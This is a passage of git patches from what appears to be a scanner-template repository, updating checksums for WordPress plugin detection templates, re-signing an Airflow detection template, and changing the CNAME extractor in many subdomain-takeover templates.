+http/technologies/wordpress/plugins/megamenu.yaml:53abfe4abb3a3546a9e80805536359465831522e +http/technologies/wordpress/plugins/members.yaml:eb9aa70ebef58ae731c3fbfcfce4644825bcf054 +http/technologies/wordpress/plugins/meta-box.yaml:2870a3b9bc2c19c1a76159e4447fda8d1ab34199 +http/technologies/wordpress/plugins/metform.yaml:aaf8cb7ce7440ced7f4860cb611337228353081e +http/technologies/wordpress/plugins/ml-slider.yaml:f17578bd39a2b905613db1f9d7002993215a986d +http/technologies/wordpress/plugins/newsletter.yaml:81fc40343e5556373e9153fb6f8382d04d1f008e +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:04127e2becaa6d815f286607afbced988b838234 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:3fa8767f8375a91ed9c56f51251fa055e587258a +http/technologies/wordpress/plugins/ninja-forms.yaml:7d2c5e18e6097dd9142e815dd8f5c36b54a818ed +http/technologies/wordpress/plugins/ocean-extra.yaml:101659ab81f5027e69b9496d49258111df592e0a +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:586bdcb217992655954d142c66c76c39eb3c51b9 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:bd8ea8a0723bd91b6b218f5bb082a62038c5a46d +http/technologies/wordpress/plugins/optinmonster.yaml:592de23a60bd950835dc547aa427570de4451087 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d24dc77a7d07390ff00d05d679a7d9d051ccfa9 +http/technologies/wordpress/plugins/password-protected.yaml:c09cc08d25ffec19d9bddb80dcaca126cd8214f1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:7dc6dccf029f556d8024e86d7f983b7c970873eb http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:d59444a33c177c82fc542b17cc5c5a6d1de898cd +http/technologies/wordpress/plugins/pixelyoursite.yaml:b1a1707e9ea73fa3c815ec7425d3b8fcf1b1eadd +http/technologies/wordpress/plugins/polylang.yaml:474b86b03c47fd6c71387ac75a57f2605561c588 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:3ed0cb4e0842445653d4b6f4284f9cab51b337cd +http/technologies/wordpress/plugins/post-smtp.yaml:5c180878d4a566d9e35f49d47fa1a32e298f1db3 +http/technologies/wordpress/plugins/post-types-order.yaml:46ff92ab4c3b0f3f882b4cde5f4482af345d0165 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:72ec0fb4c2b0495c6a85806bbd7a41cf570e5ba5 +http/technologies/wordpress/plugins/pretty-link.yaml:7d2595787ef71bfc0f8263b352950574c82afbbd +http/technologies/wordpress/plugins/really-simple-captcha.yaml:820fb389b06874e8609b9cb97946e84ba0d4990e +http/technologies/wordpress/plugins/really-simple-ssl.yaml:ea5b1a5d00a1bfe9040eb5a23dc864d6b4c00e5d +http/technologies/wordpress/plugins/redirection.yaml:86f2c0d6ee7b8f4be33b172415d121cca0c0fc48 +http/technologies/wordpress/plugins/redux-framework.yaml:77d5d95bf85d6717e879e204e15bd12328af0772 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:911acc0810788cbded5214fe73d71c572cf101ed +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:be3e61e48eb34279bbe7c84eb013417222c2b5e8 +http/technologies/wordpress/plugins/safe-svg.yaml:a210a5588617bc1fa9dee29779b886e3e8effe4c +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:9daa6afe994199102a2d27647f7289e5a75e937d +http/technologies/wordpress/plugins/sg-cachepress.yaml:cfbfebaa8032cc1cc442bcef45c6fcb738d991ff +http/technologies/wordpress/plugins/sg-security.yaml:67b421bf7f537d741b6498008b25f145905b409b +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:909597cab42dda480c2b8f6bcfb93b776ceb071f +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:eb62954c099fd040e0a841a6763895bf70af5155 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:7621180c487cc3140d4025a0d41b3f8a2d50b60a +http/technologies/wordpress/plugins/simple-history.yaml:f28952411d1d06b36dff1dd3ad2f0977ced41299 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:e2ee08639c89ccd9bce93751a2af5f0811625b00 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:d8b01acbb97663782bb2dcedfe15120cc436e270 +http/technologies/wordpress/plugins/smart-slider-3.yaml:273c9034d34b21bd24dfaeb4cfbb50f261c8ec35 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:ec9b1dd5baadb957a5024484538a923d3fbfd8b1 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b4be0a274e0e8f4d23826d09d4bd337e7e121295 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:349a5a2836a67e5aeeca8ef1fef577003e16c12b +http/technologies/wordpress/plugins/sucuri-scanner.yaml:2d32a809cfdaf412a4ff8847d5f0b24896f2166a http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:7838667e6eaf29a7718aa4a3007acc7b19326275 +http/technologies/wordpress/plugins/tablepress.yaml:a59b63b077703bae19256601e2f054fd3ab88c05 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a5ee503fc1ce460363d66fd08627a5aab79e0efd +http/technologies/wordpress/plugins/templately.yaml:2db3b797ef0a62165f2c311073ece669e135c8c4 +http/technologies/wordpress/plugins/the-events-calendar.yaml:1445a9f55118fc7c160041892f8d57d1c18a55f8 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:b0d6964edb54e6bfcf5592e4a6c554a6dc3994bb +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97fd1f5f89ad4326876884779c11ac25c36d2956 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:0040d3f036440bec9a35e0417734d55766c9434b +http/technologies/wordpress/plugins/under-construction-page.yaml:d43fc2fb8627533a49d8b2c2da77fd540534ff41 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:cbc91cf7ce469434f73d844364722b875291b2d3 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:d14c554fb8aa859859b95246765c241b76449e8c http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:6ad4f075c3b11ab9ab8ab22afb12916cb1ac85a1 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:182dff70a183be1ce58d398f325dce067a7be421 +http/technologies/wordpress/plugins/webp-express.yaml:d96dbe01868e7f6c294a7f0ef5f9a06ca937019a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:bd4413b1636802ae18dfa8fb311c28c6aea1f578 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:196218a0da05878689fd400af5eb4e4d8539d8cc +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0cf0f384811980e615be535800d170a87db872bd +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1f65c870b9f2f91a951f70ade0312a0cfab1661a http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:1afc52f929ec9582fb3278094f229c10bc4bbfe5 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:8f22f2db9650e88efaf2fc5981be84e768ece1de +http/technologies/wordpress/plugins/woocommerce-payments.yaml:fd658cedd8cf8a63c2dd7ed0f27256609501a08b +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:7dbfcf09843dfc1877ff29ffeef7a40dc6fecc5a +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e9d8fc04347388ee797bb3ee322f01f3530a700a +http/technologies/wordpress/plugins/woocommerce-services.yaml:4f1f3b1eb1de8b786c2703f924c6ab5d7a0c7589 +http/technologies/wordpress/plugins/woocommerce.yaml:60a184c63a41e4dc512c1da9ff3735ab605dad61 +http/technologies/wordpress/plugins/wordfence.yaml:2738513fb3811d043d0cedcd96829f663eab94e7 +http/technologies/wordpress/plugins/wordpress-importer.yaml:0212f60dbff855eae87944cc3c4f83bd27585c43 +http/technologies/wordpress/plugins/wordpress-seo.yaml:e5c7f6f2aecddb9fe6241a41b962188d453d6f97 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:54ca4f53e69168d17b1df9256f30d09055ea79bd +http/technologies/wordpress/plugins/wp-crontrol.yaml:a819e65274a3de58b05ab005431f3e918bc22962 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8217364e18e66f7ce3a4fa77d099eb35fe039330 +http/technologies/wordpress/plugins/wp-file-manager.yaml:3272d9107223b4e01fa7506d51d78da565bbc833 +http/technologies/wordpress/plugins/wp-google-maps.yaml:bde2b1813974517a05a2fad0e82af9944261b63c +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4570f87f20178bcd3e02c8c5891f33acee857006 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:3e623bc7c56701d405692a8ed5e861c8c2cd5b95 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:f4dbb7e61a436a4da4134dc2d868c6915331dcd1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:2393cc8bc78037fbc8167c2438ae7a63d0a9d637 +http/technologies/wordpress/plugins/wp-optimize.yaml:f7984b59e04a45299bba6b33f5b37bad3fc66b72 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:3edd03c615851555bb2b084e4dbed8a06a890e9e +http/technologies/wordpress/plugins/wp-reset.yaml:33a0ae96e4ad9cfbbe07d9a155dbe09016eabe76 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e9768ac87eb7db331577151f493cf2319b2769bd +http/technologies/wordpress/plugins/wp-rollback.yaml:cb17d5ebe6a8dcaba932c945aacb90479feb3f97 +http/technologies/wordpress/plugins/wp-seopress.yaml:f770591280993a565f19a40f1007b1238b0d0386 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b68110c8120d21e32f19068852501e00b675d5bb +http/technologies/wordpress/plugins/wp-smushit.yaml:76a39dc9526ba71cf5d38d5128b3bd15caaa7484 +http/technologies/wordpress/plugins/wp-statistics.yaml:7b70469b68973f20bca95a7df4648adeaf678e52 +http/technologies/wordpress/plugins/wp-super-cache.yaml:a4cc188458f26ccb496e108f106caccd85f54edd http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:68c90673d799faf2f3942d0f3738503d3ba71fac +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:840b896ad7646bc99ec66fbb0814038cd2849a52 +http/technologies/wordpress/plugins/wpforms-lite.yaml:a4e58c9002ad922e9d2def6996c08da1fa1ceb51 +http/technologies/wordpress/plugins/wps-hide-login.yaml:61957fd8a9885be1a9b55d5caf48be9db3766524 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:8ddfd01cdf4c89c955859cba4e134594d4eb1557 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e741854d5d621f89fe039b8fffb795b0ac2227c0 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8888,7 +8888,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8a6aa78697c27df1a9b49a97349ce50daf43a30b +templates-checksum.txt:f6ac373ab772212e09396bc03203208dff7196ef wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 616e6c6046f0487e69aaa25ce21e06ca762d929e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 14:29:15 +0000 Subject: [PATCH 1330/1841] Auto Template Signing [Wed Jul 17 14:29:15 UTC 2024] :robot: --- http/technologies/apache/airflow-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index b85792d59b..89e53422cc 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -25,5 +25,4 @@ http: - type: status status: - 404 - -# digest: 4b0a0048304602210090bc87e2b346dc271828d73439387b1b3025a6a7b967cef6a74fea8466ff74fe022100ed3f535da14e849368eec9d5eccba31a7dc7712627910bd2974c40c86828a04e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d05f182da82a3e03fd10b2978e012a6b41ed44bb Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 17 Jul 2024 20:08:10 +0530 Subject: [PATCH 1331/1841] use cname dsl instead of resolve helper (#10249) --- http/takeovers/aftership-takeover.yaml | 2 +- http/takeovers/agilecrm-takeover.yaml | 2 +- http/takeovers/aha-takeover.yaml | 2 +- http/takeovers/airee-takeover.yaml | 2 +- http/takeovers/anima-takeover.yaml | 2 +- http/takeovers/announcekit-takeover.yaml | 2 +- http/takeovers/bigcartel-takeover.yaml | 2 +- http/takeovers/bitbucket-takeover.yaml | 2 +- http/takeovers/campaignmonitor-takeover.yaml | 2 +- http/takeovers/canny-takeover.yaml | 2 +- http/takeovers/cargo-takeover.yaml | 2 +- http/takeovers/cargocollective-takeover.yaml | 2 +- http/takeovers/clever-takeover.yaml | 2 +- http/takeovers/flexbe-takeover.yaml | 2 +- http/takeovers/frontify-takeover.yaml | 2 +- http/takeovers/gemfury-takeover.yaml | 2 +- http/takeovers/getresponse-takeover.yaml | 2 +- http/takeovers/ghost-takeover.yaml | 3 +-- http/takeovers/gitbook-takeover.yaml | 2 +- http/takeovers/github-takeover.yaml | 2 +- http/takeovers/gohire-takeover.yaml | 2 +- http/takeovers/hatenablog-takeover.yaml | 2 +- http/takeovers/helpdocs-takeover.yaml | 2 +- http/takeovers/helpjuice-takeover.yaml | 2 +- http/takeovers/helprace-takeover.yaml | 2 +- http/takeovers/helpscout-takeover.yaml | 2 +- http/takeovers/hubspot-takeover.yaml | 2 +- http/takeovers/intercom-takeover.yaml | 2 +- http/takeovers/jazzhr-takeover.yaml | 2 +- http/takeovers/jetbrains-takeover.yaml | 2 +- http/takeovers/kinsta-takeover.yaml | 2 +- http/takeovers/launchrock-takeover.yaml | 2 +- http/takeovers/leadpages-takeover.yaml | 2 +- http/takeovers/lemlist-takeover.yaml | 2 +- http/takeovers/mashery-takeover.yaml | 2 +- http/takeovers/meteor-takeover.yaml | 2 +- http/takeovers/netlify-takeover.yaml | 2 +- http/takeovers/ngrok-takeover.yaml | 2 +- http/takeovers/pagewiz-takeover.yaml | 2 +- http/takeovers/pantheon-takeover.yaml | 2 +- http/takeovers/pingdom-takeover.yaml | 2 +- http/takeovers/proposify-takeover.yaml | 2 +- http/takeovers/readme-takeover.yaml | 2 +- http/takeovers/readthedocs-takeover.yaml | 2 +- http/takeovers/shopify-takeover.yaml | 2 +- http/takeovers/short-io.yaml | 2 +- http/takeovers/simplebooklet-takeover.yaml | 2 +- http/takeovers/smartjob-takeover.yaml | 2 +- http/takeovers/smugmug-takeover.yaml | 2 +- http/takeovers/softr-takeover.yaml | 2 +- http/takeovers/sprintful-takeover.yaml | 2 +- http/takeovers/squadcast-takeover.yaml | 2 +- http/takeovers/strikingly-takeover.yaml | 2 +- http/takeovers/surge-takeover.yaml | 2 +- http/takeovers/surveygizmo-takeover.yaml | 2 +- http/takeovers/surveysparrow-takeover.yaml | 2 +- http/takeovers/tave-takeover.yaml | 2 +- http/takeovers/teamwork-takeover.yaml | 2 +- http/takeovers/tilda-takeover.yaml | 2 +- http/takeovers/tumblr-takeover.yaml | 2 +- http/takeovers/uberflip-takeover.yaml | 2 +- http/takeovers/uptime-takeover.yaml | 2 +- http/takeovers/uptimerobot-takeover.yaml | 2 +- http/takeovers/uservoice-takeover.yaml | 2 +- http/takeovers/vend-takeover.yaml | 2 +- http/takeovers/wishpond-takeover.yaml | 2 +- http/takeovers/wix-takeover.yaml | 2 +- http/takeovers/wordpress-takeover.yaml | 2 +- http/takeovers/worksites-takeover.yaml | 2 +- http/takeovers/wufoo-takeover.yaml | 2 +- http/takeovers/zendesk-takeover.yaml | 2 +- 71 files changed, 71 insertions(+), 72 deletions(-) diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index bee7fbfa3c..b4c4878d58 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502203bd36036183a037bd252566dbbb5e7f0816219e8cea973674b3f087995c41183022100b4efe16a28cab2e2e12dfe9019bbf1fe083d72eb5c660a2ab0bdbd5dce65d877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index 18097debdd..851804ae8d 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502203e5437cdfd4734103ae21b5624d49a86012197e68f1ef22d4c61fd6506d2fd6b02210087c84457ec74570230a4ef789f50de0e6ad5bb3bdc311ddf92f804922863588c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 50fab0b951..5621d77464 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -29,5 +29,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4a0a0047304502210081e62f08cee1995440a0f533dac16d17a3d3e09858d21de29e4eb7768384812702204e28ac0c2110a91fb6eb08414f3cec591f0efff3b7e935cd6b23a82346138dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index 40d04ceb9c..318077c51c 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -30,5 +30,5 @@ http: extractors: - type: dsl dsl: - - "resolve(Host, 'cname')" + - cname # digest: 4b0a00483046022100cb3b0d821630b1eb25fed8fae0a01c86dfdd0a5c047890f73228940bacad89b9022100b885654efd91153696697c0aa418b20838ae50cf6fe9fc2afd7a119b36f9c69e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index 